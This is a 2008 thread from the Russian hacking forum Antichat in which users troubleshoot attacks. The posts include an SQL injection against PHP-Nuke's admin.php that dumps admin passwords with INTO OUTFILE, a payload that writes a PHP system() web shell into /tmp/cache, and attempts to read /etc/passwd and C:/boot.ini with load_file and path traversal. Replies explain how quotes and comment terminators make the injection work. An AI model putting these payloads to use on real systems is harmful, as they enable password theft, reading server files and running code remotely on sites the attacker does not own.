Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
23.07.2008, 17:59
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
Так,может не сюда написал,но всё-таки. http://www.xakep.ru/magazine/xa/062/080/3.asp
При использовании материала из этой статьи не получилось создать кривого имени файла(используя UNS префиксы \\?\),но с папками работает третий способ - и работает на ура)).У кого-нибудь получалось создавать *не удаляемые* файлы ? Также в статье говорилось,что существуют программы,способные исправить сию *пошлость*. Хотелось бы знать - какие.
|
|
|
23.07.2008, 19:32
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
Да,и вот ещё вопрос - как обойти экранирование символов < > ? Возможно ли вообще)
|
|
|
|
24.07.2008, 01:21
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
http://127.0.0.1/phpnuke69/admin.php?op=login&pwd=123&aid=admin' INTO OUTFILE 'pwd.txt
После запроса данной строки в БД исполняется:
9 Query SELECT pwd, admlanguage FROM nuke_authors WHERE aid='admin' INTO OUTFILE 'pwd.txt'
Почему именно везде надо ставить одну кавычку ? почему не две?)
Ваще *** какая-то - Если не ставить кавычек,он итак обрамляет ( 'buke','user' и т.д.).Так зачем ещё кавычки ставить ?
Я использовал так :
select '<?system();?>' into outfile '/tmp/cache/tratatata.php'/*
Вот,я использовал 4 кавычки. Может я параноик... эти кавычки медленно,но верно убивают мой моск... спасите.
ЗЫ: Напоминаю ещё раз - это всего лишь пример (я имею ввиду интерпретацию функций и путей,так что не ругайте =_= ).
|
|
|
|
24.07.2008, 01:41
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 834
Провел на форуме:
3941248
Репутация:
668
|
|
Велемир Кто тебе сказал что НАДА ставить кавычку ? просто еслы ты не вставиш ковычку запрос выйдет такой
9 Query SELECT pwd, admlanguage FROM nuke_authors WHERE aid='admin INTO OUTFILE pwd.txt'
тоесть выоплнется там ГДЕ aid = admin INTO OUTFILE pwd.txt ...
а нам надо просто ещё часть запроса добваить поэтому мы делаем так
ставим ковычку ' и полуается что мы указали что aid = admin но остаётся ещё одна проблема .... при таком раскладе выходит таой запрос
9 Query SELECT pwd, admlanguage FROM nuke_authors WHERE aid='admin INTO OUTFILE pwd.txt ''
а поэтому нам не нужна ковычка в конце ... хотя моно добавить /* и всё остальное зашитается как коментарий =)
п.с вроде всё правильно 
п.с.с это всё зависи от того как выглядит запрос в скрипте... иногда ваще надо вставлять не ' а "
|
|
|
|
24.07.2008, 01:43
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337
Репутация:
3486
|
|
Может стоит выучить элементарный синтаксис mysql а потом задавать вопросы?
|
|
|
|
24.07.2008, 03:53
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
Ладно-с...пасибо:Д.Вот не пойму,почему не грузится фаил лоад файлом(etc/passwd),имея права.Фильруются кавычки - двойные и одинарные. Как обычно,захексил всё нафиг(без кавычек разумеется(/etc/passwd).В итоге пустая страница,а такого не должно быть =_=.Пробывал и ../../../../../etc/passwd - результат один и тот же.Этот фаил доступен всегда,и права на чтения есть =_=.
|
|
|
|
24.07.2008, 04:02
|
|
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038
Репутация:
1385
|
|
Сообщение от Велемир
Ладно-с...пасибо:Д.Вот не пойму,почему не грузится фаил лоад файлом(etc/passwd),имея права.Фильруются кавычки - двойные и одинарные. Как обычно,захексил всё нафиг(без кавычек разумеется(/etc/passwd).В итоге пустая страница,а такого не должно быть =_=.Пробывал и ../../../../../etc/passwd - результат один и тот же.Этот фаил доступен всегда,и права на чтения есть =_=.
а может файла такого нету !
может сервак на винде стоит .... 
|
|
|
|
24.07.2008, 04:41
|
|
Познающий
Регистрация: 15.09.2005
Сообщений: 60
Провел на форуме:
254802
Репутация:
52
|
|
Или ты заблуждаешься думая что у mysql обязательно должны быть права на чтение этого файла  |
|
|
|
24.07.2008, 10:53
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408
Репутация:
861
|
|
Велемир, у пользователя, из-под которого ты пытаешься открыть файл может не быть file_priv
Последний раз редактировалось n0ne; 24.07.2008 в 13:36..
|
|
|
|
24.07.2008, 11:03
|
|
Banned
Регистрация: 17.07.2008
Сообщений: 14
Провел на форуме:
81162
Репутация:
27
|
|
А может там действительно винда =) Попробуй load_file('C:/boot.ini')
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
